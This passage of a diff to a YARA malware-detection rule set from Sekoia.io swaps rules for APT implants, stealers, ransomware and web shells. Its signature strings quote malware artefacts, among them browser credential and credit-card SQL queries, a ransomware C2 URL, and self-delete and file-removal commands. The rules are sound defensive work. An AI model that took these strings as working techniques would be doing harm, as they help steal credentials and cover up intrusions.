+		hash1 = "c6a3a1ea84251aed908702a1f2a565496d583239c5f467f5dcd0cfc5bfb1a6db"
+		hash2 = "33fd050760e251ab932e5ca4311b494ef72cee157b20537ce773420845302e49"
 
 	condition:
-		$s1 in ( @s2 .. @s2-100 )
+		pe.imphash( ) == "aeea1135af87e6b6b23fa7da995967ea" or hash.md5 ( pe.rich_signature.clear_data ) == "1c850cf955b35f60ee6c12d01161d95d" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "4a80edcce2a5ac85c3f849172ee89c0f" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "53781057440f51882c38d3a9ef611775" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "801b286d84a97fe919721843ab77210d" )
 }
-rule SEKOIA_Apt_Luckymouse_Rshell_Strings : FILE
+rule SEKOIA_Apt_Aptc60_Downloader_Strings : FILE
 {
 	meta:
-		description = "Detects LuckyMouse RShell Mach-O implant"
+		description = "Detects a simple downloader abusing wlrmdr.exe and used by APT-C-60"
 		author = "Sekoia.io"
-		id = "89f18013-ea3e-440f-821e-cef102a43b7b"
-		date = "2022-08-05"
+		id = "02fd6d5b-7211-46cc-bcff-ab5d78e459c0"
+		date = "2024-09-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_luckymouse_rshell_strings.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ffca47856d4c4d83312220cff23c0a556be0e675d59ac009c2f74fc0e39cb816"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_aptc60_downloader_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "b14ef85a60ac71c669cc960bdf580144"
+		logic_hash = "f05480834e6d91a852a190a2ecec05aaea1affa8a605a56c80962a9fbfc8f0c0"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227840,91 +228386,84 @@ rule SEKOIA_Apt_Luckymouse_Rshell_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 64 69 72 00 70 61 74 68
-        00 64 6F 77 6E 00 72 65
-        61 64 00 75 70 6C 6F 61
-        64 00 77 72 69 74 65 00
-        64 65 6C }
-		$ = { 6C 6F 67 69 6E 00 68 6F
-        73 74 6E 61 6D 65 00 6C
-        61 6E 00 75 73 65 72 6E
-        61 6D 65 00 76 65 72 73
-        69 6F 6E }
+		$ = "mydllmain" fullword
+		$ = "-s 3600 -f 0 -t _ -m _ -a 11 -u" wide
+		$ = "WlrMakeService" wide
+		$ = "Trigger1" wide
 
 	condition:
-		( uint32be( 0 ) == 0xCFFAEDFE or uint16be( 0 ) == 0x4d5a ) and filesize < 300KB and all of them
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 500KB
 }
-rule SEKOIA_Apt_Lazarus_Dll_C2_Comms : FILE
+rule SEKOIA_Apt_Cloudmensis_Spyagent_Strings : FILE
 {
 	meta:
-		description = "Detects DLL communicating with the C2"
+		description = "Detects CloudMensis SpyAgent"
 		author = "Sekoia.io"
-		id = "9b379aa8-77ce-4c76-ab13-05e35ebfbdfe"
-		date = "2023-04-04"
+		id = "c2df8373-6698-4b23-9d77-8e7968bd69f0"
+		date = "2022-07-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_lazarus_dll_c2_comms.yar#L1-L33"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b5ba5ae25822cf54d530d1a18c8196194d44e4fd76be1a0bf98c193772286282"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cloudmensis_spyagent_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ad858b1b78fb4ac6efee093b11fde14956d63bc6b300ef37bf1f2a3356cf4402"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "fe948451df90df80c8028b969bf89ecbf501401e7879805667c134080976ce2e"
-		hash2 = "bb1066c1ca53139dc5a2c1743339f4e6360d6fe4f2f3261d24fc28a12f3e2ab9"
-		hash3 = "dca33d6dacac0859ec2f3104485720fe2451e21eb06e676f4860ecc73a41e6f9"
-		hash4 = "69dd140f45c3fa3aaa64c69f860cd3c74379dec37c46319d7805a29b637d4dbf"
 
 	strings:
-		$x1 = "vG2eZ1KOeGd2n5fr" ascii fullword
-		$s1 = "Windows %d(%d)-%s" ascii fullword
-		$s2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" wide fullword
-		$op1 = {B8 C8 00 00 00 83 FB 01 44 0F 47 E8 41 8B C5 48 8B B4 24 E0 18 00 00 4C 8B A4 24 E8 18 00 00 48 8B 8D A0 17 00 00 48 33 CC}
-		$op2 = {33 D2 46 8D 04 B5 00 00 00 00 66 0F 1F 44 00 00 49 63 C0 41 FF C0 8B 4C 84 70 31 4C 94 40 48 FF C2}
-		$op3 = {89 5C 24 50 0F 57 C0 C7 44 24 4C 04 00 00 00 C7 44 24 48 40 00 00 00 0F 11 44 24 60 0F 11 44 24 70 0F 11 45 80 0F 11 45 90}
+		$ = "[control_thread loop_DirStructure:]"
+		$ = "[screen_keylog getScreenShotData]"
+		$ = "[screen_keylog loop_usb]"
+		$ = "[Management UploadFilebyPath:destination:]"
+		$ = "[control_thread loop_pwd:]"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and ( filesize < 500KB and ( 1 of ( $x* ) or 2 of them ) or ( $x1 and 1 of ( $s* ) or 3 of them ) )
+		uint32be( 0 ) == 0xcafebabe and filesize < 2MB and all of them
 }
-rule SEKOIA_Loader_Win_Purecrypter : FILE
+rule SEKOIA_Apt37_Rokrat_Macho
 {
 	meta:
-		description = "Detect the PureCrypter loader"
+		description = "Detects Public key of Macho samples of RokRAT"
 		author = "Sekoia.io"
-		id = "500b4d9e-55f8-41d1-ad4f-d587bbeb4507"
-		date = "2022-09-22"
+		id = "c54fb9ae-85fa-4c36-bab9-6c6d989262ba"
+		date = "2022-09-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_purecrypter.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5d0d733a4f8447d2d51656a20640fc9482581e19ba1d53fed7d98e85bb748763"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt37_rokrat_macho.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "526dc4594db099ed8090a673e761f84f6dd7ce860e380214e4d3f1ec08fc2345"
 		score = 75
-		quality = 55
-		tags = "FILE"
+		quality = 66
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$hex01 = /http:\/\/[^\s]{5,90}_[A-Z][a-z]{7}\.(bmp|jpg|png)/ wide
-		$hex02 = "WrapNonExceptionThrows" ascii
+		$s1 = { 4D 49 49 42 49 6A 41 4E 42 67 6B 71 68 6B 69 47 39 77 30 42 41 51 45 46 41 41 4F 43 41 51 38 41 4D 49 49 42 43 67 4B 43 41 51 45 41 73 47 52 59 53 45 56 76 77 6D 66 42 46 4E 42 6A 4F 7A 2B 51}
+		$s2 = {70 61 78 35 72 7A 57 66 2F 4C 54 2F 79 46 55 51 41 31 7A 72 41 31 6E 6A 6A 79 49 48 72 7A 70 68 67 63 39 74 67 47 48 73 2F 37 74 73 57 70 38 65 35 64 4C 6B 41 59 73 56 47 68 57 41 50 73 6A 79}
+		$s3 = {31 67 78 30 64 72 62 64 4D 6A 6C 54 62 42 59 54 79 45 67 35 50 67 79 2F 35 4D 73 45 4E 44 64 6E 73 43 52 57 72 32 33 5A 61 4F 45 4C 76 48 48 56 56 38 43 4D 43 38 46 75 34 57 62 61 7A 38 30 4C}
+		$s4 = {47 68 67 38 69 73 56 50 45 48 43 38 48 2F 79 47 74 6A 48 50 59 46 56 65 36 6C 77 56 72 2F 4D 58 6F 4B 63 70 78 31 33 53 31 4B 38 6E 6D 44 51 4E 41 68 4D 70 54 31 61 4C 61 47 2F 36 51 69 6A 68}
+		$s5 = {57 34 50 2F 52 46 51 71 2B 46 64 69 61 33 66 46 65 68 50 67 35 44 74 59 44 39 30 72 53 33 73 64 46 4B 6D 6A 39 4E 36 4D 4F 30 2F 57 41 56 64 5A 7A 47 75 45 58 44 35 33 4C 48 7A 39 65 5A 77 52}
+		$s6 = {39 59 38 37 38 36 6E 56 44 72 6C 6D 61 35 59 43 4B 70 71 55 5A 35 63 34 36 77 57 33 67 59 57 69 33 73 59 2B 56 53 33 62 32 46 64 41 4B 43 4A 68 54 66 43 79 38 32 41 55 47 71 50 53 56 66 4C 61}
+		$s7 = {6D 51 49 44 41 51 41 42}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $hex02 in ( @hex01 .. @hex01 + 1000 ) or $hex01 in ( @hex02 .. @hex02 + 1000 ) )
+		all of them
 }
-rule SEKOIA_Apt_Gelsemium_Firewood_Backdoor : FILE
+rule SEKOIA_Crypter_Win_Dotrunpex : FILE
 {
 	meta:
-		description = "Detects Gelsemium's FireWood backdoor"
+		description = "Detect the dotRunpeX crypter based on strings"
 		author = "Sekoia.io"
-		id = "93670c07-9edd-4ea2-b8ed-6fee625491f4"
-		date = "2024-11-22"
+		id = "6fb4ffe0-3a5c-432c-8ae2-404bb5960c30"
+		date = "2023-06-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gelsemium_firewood_backdoor.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "2251bc7910fe46fd0baf8bc05599bdcf"
-		logic_hash = "dea8c7cfb35b3cc026a0df844e118b495e3ad0a85f55e2fd3b63a41dde2ea944"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/crypter_win_dotrunpex.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8a2b9e19b49ba17f976241bec5323121ba13d2ce39fdcf2777fd97a230211e75"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -227932,168 +228471,218 @@ rule SEKOIA_Apt_Gelsemium_Firewood_Backdoor : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "root dir:%s"
-		$ = "df -h|grep 'dev' |grep -v none|awk '/dev/{print $6}'"
-		$ = "rm -rf ../lib/%s"
-		$ = "Total Disk space:%luG, Free Disk spae:%luG"
+		$ = {52 00 75 00 6e 00 70 00 65 00 58 00 2e 00 53 00 74 00 75 00 62 00 2e 00 46 00 72 00 61 00 6d 00 65 00 77 00 6f 00 72 00 6b 00 2e 00 65 00 78 00 65}
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Loader_Win_Jinxloader_Strings : FILE
+rule SEKOIA_Apt_Unk_Hrserv_Memory_Commands_Strings
 {
 	meta:
-		description = "Finds JinxLoader samples based on the specific strings"
+		description = "Detects HrServ web shell memory commands"
 		author = "Sekoia.io"
-		id = "fd2f7e8c-f4a8-4452-bbc6-e03790f8ed89"
-		date = "2023-12-04"
+		id = "1b5f442a-e758-4bd5-a612-8b504a542d29"
+		date = "2023-11-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_jinxloader_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "816cb6019cba1aa2e229ab476fcdf378348981920cbe17d3dfb875f8b2dcbf81"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_unk_hrserv_memory_commands_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a87c35658ded301c098f9ee8ee5886a54e89537eabd145cf82b0286c703a77d2"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "JinxV2" ascii
-		$str02 = "main.main.func1" ascii
-		$str03 = "go.shape.struct" ascii
-		$str04 = ".glob..func" ascii
+		$ = "list all the process" ascii wide
+		$ = "equal with cmd /c tasklist" ascii wide
+		$ = "start target service by name" ascii wide
+		$ = "query local process information by wmi." ascii wide
+		$ = "upload local shellcode to" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and #str04 > 100 and filesize > 8MB
+		all of them
 }
-rule SEKOIA_Apt_Badmagic_Commonmagic_Usbstealer : FILE
+rule SEKOIA_Ransomware_Win_Honkai_Jan2023 : FILE
 {
 	meta:
-		description = "Detects CommonMagic related implants"
+		description = "Rule to detect Honkai ransomware samples."
 		author = "Sekoia.io"
-		id = "37d5becc-f1c3-4400-bc10-cd6036d4dbb1"
-		date = "2023-05-15"
+		id = "6ef91cb5-e122-4f91-bc15-3813b8f91cbf"
+		date = "2023-02-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_commonmagic_usbstealer.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a600f17bce9159b581c234cc101d1a0d093954fc9c79052dbca5451714fd7502"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_honkai_jan2023.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "19f831f77e043f11b790b7f24e9f585e4986d9af6580bae7c344b7960f2f0965"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "989cf96da60d9ebfb6f364717b4f0cae1667fdc7f9d89f77acc254ab47d439e6"
 
 	strings:
-		$ = "\\\\.\\pipe\\PipeDtMd" ascii wide fullword
-		$ = "State USB" ascii wide
-		$ = "DefaultNameDevice" ascii wide
-		$ = "SerialNumber" ascii wide
+		$s1 = "DP_Main.exe" ascii wide
+		$s2 = "DP_MainForm" ascii wide
+		$s3 = "DP_Main" ascii wide
+		$s4 = "#DECRYPT MY FILES#.html" ascii wide
+		$s5 = "/api/Encrypted.php" ascii wide
+		$s6 = "http://upload.paradisenewgenshinimpact.top:2095" ascii wide
+		$s7 = "main@paradisenewgenshinimpact.top" ascii wide
+		$s8 = ".honkai" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and 6 of them
 }
-rule SEKOIA_Ursnif : FILE
+
+rule SEKOIA_Stealer_Win_Luca : FILE
 {
 	meta:
-		description = "Ursnif Payload"
+		description = "Detect Luca stealer. Open source Rust stealer."
 		author = "Sekoia.io"
-		id = "ac392af3-c344-453c-9427-5bb46223e01c"
-		date = "2024-12-19"
+		id = "d2cc1442-0ba5-4e81-9fea-e9e078903eed"
+		date = "2022-07-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ursnif.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fd3c3be5ede0a980b44560cfb9b8c4c1ee322091fa86bc9143f30dc900053c2b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/stealer_win_luca.yar#L3-L49"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "3694db49d84f92c70c51e4fe6f126fd56b3d7d8ed26619137fd55b0adb97865e"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$crypto64_1 = {41 8B 02 ?? C1 [0-1] 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D?}
-		$crypto64_2 = {44 01 44 24 10 FF C1 41 8B C0 D1 64 24 10 33 C3 41 8B D8 FF 4C 24 10 41 33 C3 01 44 24 10 D3 C8 01 44 24 10 41 89 02 49 83 C2 04 83 C2 FF 75 C3}
-		$crypto64_3 = {33 C6 ?? C7 [0-1] 49 83 C2 04 33 C3 8B F1 8B CF D3 C8 89 02 48 83 C2 04 41 83 C3 FF 75 ?? 45 85 C9 75 ?? 41 83 E0 03}
-		$crypto64_4 = {41 8B 02 41 8B CB 41 83 F3 01 33 C3 41 8B 1A C1 E1 03 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 C6}
-		$decrypt_config64 = {44 8B D9 33 C0 45 33 C9 44 33 1D ?? ?? ?? 00 ?? ?? D2 ?? ?? D2 74 ?? 4C 8D 42 10 45 3B 0A 73 2? 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12}
-		$crypto32_1 = {01 45 FC D1 65 FC FF 4D FC 33 C1 33 45 0C 01 45 FC 43 8A CB D3 C8 8B CE 01 45 FC 89 02 83 C2 04 FF 4D 08 75 CD}
-		$crypto32_2 = {33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 D9}
-		$decrypt_config32 = {8B ?? 08 5? 33 F? 3B [1-2] 74 14 A1 0? ?? ?? ?? 35 ?? ?? ?? ?? 50 8B D? E8 ?? D? 00 00 EB 02 33 C0 ?B ?? ?? ?? ?? ?? ?? ?? 74 14 8D 4D ?? ?? ?? 50 FF D? 85 C0 74 08}
+		$ = "cookies"
+		$ = "creditcards"
+		$ = "/Default/Network/CookiesUser Data/Default/Network/Cookies_cookies"
+		$ = "/Default/Web DataUser Data/Default/Web Data_webdata"
+		$ = "SELECT action_url, username_value, password_value FROM loginsSELECT card_number_encrypted, name_on_card, expiration_month, expiration_year FROM credit_cardsSELECT host_key, name, encrypted_value, path, expires_utc, is_secure FROM cookiesLOCALAPPDATA"
+		$ = "\\logsxc\\passwords_.txt"
+		$ = " Name:"
+		$ = "User: "
+		$ = "Installed Languages:  "
+		$ = "Operating System: "
+		$ = "Used/Installed RAM:  GB "
+		$ = "Cores available: "
+		$ = "\\screen-.png"
+		$ = "Username: "
+		$ = "Computer name: "
+		$ = "OS: "
+		$ = "Language: "
+		$ = "Hostname: "
+		$ = "=> networks: B"
+		$ = "=> system:total memory:  KB"
+		$ = "used memory : "
+		$ = "total swap  : "
+		$ = "used swap   : "
+		$ = "NB CPUs: "
+		$ = "Passwords: "
+		$ = "Wallets: "
+		$ = "Files: "
+		$ = "Credit Cards: "
+		$ = "sensfiles.zip"
 
 	condition:
-		true and uint16( 0 ) == 0x5A4D and ( ( $decrypt_config64 and any of ( $crypto64* ) ) or ( $decrypt_config32 and any of ( $crypto32* ) ) )
+		uint16( 0 ) == 0x5A4D and filesize > 4000KB and pe.rich_signature.toolid ( 0 , 0 ) and pe.number_of_resources == 0 and 15 of them
 }
-rule SEKOIA_Rat_Win_Asbit : FILE
+rule SEKOIA_Backdoor_Win_Rollsling : FILE
 {
 	meta:
-		description = "Finds Asbit samples based on characteristic strings"
+		description = "Detect Lazarus' RollSling malware (aka LazarLoader)"
 		author = "Sekoia.io"
-		id = "b2d60eff-3dc8-4857-a0ea-d4fcd34c40bc"
-		date = "2022-09-19"
+		id = "5ef23b9c-5bc5-4f02-b1b4-1af18a03241a"
+		date = "2023-10-24"
 		modified = "2024-12-19"
-		reference = "https://blogs.juniper.net/en-us/threat-research/asbit-an-emerging-remote-desktop-trojan"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_asbit.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1362ebe89a4d2645eb687d92510daa355a16f05da7f5513817f8439f29722827"
+		reference = "https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_rollsling.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5cee25638bdc86b3ffb1c616943d647ca170c5c0140ae3e3118f56b504fa862f"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "d9add2bfdfebfa235575687de356f0cefb3e4c55964c4cb8bfdcdc58294eeaca"
+		hash2 = "48538a935ddf2cbeb4918d0ccf9372ec8e0a57c5fd145a584a9b1bb4ebbcd5ce"
+		hash3 = "18825be6b269087d7699f3d0aa2e6db2ae72ded36c56aa8e7b8a606dde3741fa"
+		hash4 = "645205e38dfdd560f6242ba717af1bfdd8e85baf5e710d724b853fe9808c4551"
+		hash5 = "455bab490a300d9d63b8777c223287c0a6a647ca7b98b96fd3236f83b8adc77b"
 
 	strings:
-		$str01 = "/build?project=libexpat&_={0}" wide
-		$str02 = "/resolve?name={0}&short=true&_={1}" wide
-		$str03 = "/c ping 127.0.0.1 & del {0} /q & del /a:H {0} /q" wide
+		$s1 = "LookupPrivilegeVCreateRemoteThreAdjustTokenPriviOpenProcessToken"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-
-rule SEKOIA_Apt_Muddywater_Moriagent : FILE
+rule SEKOIA_Ransomware_Win_Chaos : FILE
 {
 	meta:
-		description = "Detects Muddy's Mori Agent implant"
+		description = "Detects the Chaos Ransomware"
 		author = "Sekoia.io"
-		id = "e7a83663-6a30-416a-8f29-87a6b9445ea4"
-		date = "2022-01-14"
+		id = "c1876a18-0618-44e2-8919-b4a041de97e7"
+		date = "2022-01-18"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_muddywater_moriagent.yar#L3-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "21389d4e71e9a19a9d263b8ced740c337ea88ed4ac97199897b0aa3f5914594a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_chaos.yar#L1-L46"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1947e6de8f74fe7bc52107d4a57e19eacf022121f5decee54a8c90797be844c6"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$mut = "0x50504060" ascii fullword
-		$cmd1 = "TType" ascii fullword
-		$cmd2 = "TPath" ascii fullword
-		$cmd3 = "TFileid" ascii fullword
-		$cmd4 = "TCommand" ascii fullword
-		$cmd5 = "TTimeout" ascii fullword
-		$cmd6 = "TFilter" ascii fullword
+		$rep00 = "\\Desktop" wide
+		$rep01 = "\\Links" wide
+		$rep02 = "\\Contacts" wide
+		$rep03 = "\\Documents" wide
+		$rep04 = "\\Downloads" wide
+		$rep05 = "\\Pictures" wide
+		$rep06 = "\\Music" wide
+		$rep07 = "\\OneDrive" wide
+		$rep08 = "\\Saved Games" wide
+		$rep09 = "\\Favorites" wide
+		$rep10 = "\\Searches" wide
+		$rep11 = "\\Videos" wide
+		$rep12 = "C:\\Users\\" wide
+		$str0 = "svchost.exe" wide
+		$str1 = "\\privateKey.chaos" wide
+		$str2 = "Chaos Ransomware" wide
+		$str3 = "read_it.txt" wide
+		$str4 = "<EncryptedKey>" wide
+		$str5 = "passwordBytes" ascii
+		$str6 = "lookForDirectories" ascii
+		$str7 = "Rfc2898DeriveBytes" ascii
+		$str8 = "ICryptoTransform" ascii
+		$str9 = "FromBase64String" ascii
+		$ext0 = ".torrent" wide
+		$ext1 = ".ibank" wide
+		$ext2 = ".wallet" wide
+		$ext3 = ".swift" wide
+		$ext4 = ".onetoc2" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( ( pe.number_of_exports == 2 and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllUnregisterServer" ) ) and ( 5 of them ) )
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and filesize < 2MB and 6 of ( $str* ) and 10 of ( $rep* ) and 4 of ( $ext* )
 }
-rule SEKOIA_Apt_Badmagic_Installpzz_Pshscript : FILE
+rule SEKOIA_Tinyfluff_Nodejs : FILE
 {
 	meta:
-		description = "Detects BadMagic InstallPZZ powershell script"
+		description = "Detect TinyFluff backdoor by OldGremlin"
 		author = "Sekoia.io"
-		id = "d01bc217-9e14-498b-a92a-17f6aedec269"
-		date = "2023-05-15"
+		id = "ca8cbd90-f275-4442-8354-b8b069e2efc3"
+		date = "2022-04-20"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_installpzz_pshscript.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "58256cffd1d5060769f304393c22b6488abe9515eb7df2a967ba2fed85a9ec9a"
+		reference = "https://blog.group-ib.com/oldgremlin_comeback"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tinyfluff_nodejs.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "bd0a6a3628f268a37ac9d708d03f57feef5ed55e"
+		hash = "bd0a6a3628f268a37ac9d708d03f57feef5ed55e"
+		logic_hash = "7fa07b6ea32b914887bdcada0f9fda086bc29a44bfdf27e7433ef589192f4b82"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228101,140 +228690,134 @@ rule SEKOIA_Apt_Badmagic_Installpzz_Pshscript : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "start-job -ScriptBlock $script;"
-		$ = "Start-Sleep -Second 1;"
-		$ = "Write-Output \"$url$j"
-		$ = "Start-Sleep -Second 2;"
+		$s1 = "TinyFluff.pdb" fullword ascii
+		$s2 = "node.exe" fullword wide
 
 	condition:
-		all of them and filesize < 1KB
+		filesize < 500KB and uint16be( 0 ) == 0x4d5a and all of them
 }
-
-rule SEKOIA_Implant_Win_Incontroller : FILE
+rule SEKOIA_Downloader_Win_Search : FILE
 {
 	meta:
-		description = "Detect the INCONTROLLER implant "
+		description = "'Search.exe' script used by APT42"
 		author = "Sekoia.io"
-		id = "c346c6ea-c5c0-4e9f-a632-1e8ed0286fbc"
-		date = "2022-04-14"
+		id = "8094ddda-6294-4dee-93cb-de79aaed1ec6"
+		date = "2024-08-23"
 		modified = "2024-12-19"
-		reference = "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool"
